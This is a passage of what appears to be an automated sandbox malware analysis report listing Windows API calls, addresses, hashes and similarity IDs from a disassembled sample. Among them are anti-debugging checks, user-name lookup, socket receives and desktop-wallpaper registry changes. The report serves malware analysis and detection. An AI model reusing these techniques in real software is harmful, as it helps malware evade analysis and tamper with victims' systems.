                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                            • Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                                                                            • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                            • Opcode ID: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                                                                            • Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00450B71
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4212172061-0
                                                                                                                                                                                                                                            • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                                            • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 301083792-0
                                                                                                                                                                                                                                            • Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                                                                            • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00448089
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 806657224-0
                                                                                                                                                                                                                                            • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
• Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
• Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
• Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
• Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
• Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
• Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
• Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
• Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
APIs
• GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
• TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
• ExitProcess.KERNEL32 ref: 0044259E
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
• Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
• Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
• Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
• Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
• Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
• Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
• Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                                                                                                                            • Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                                                                                                                                            • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2692324296-0
                                                                                                                                                                                                                                            • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                                            • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                                                                                                                            • Opcode ID: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                                                                            • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                            • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                                            • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                            • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084509184-0
• Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
• Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
• Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
• Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
• Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
• Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
• Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
• Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
• Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
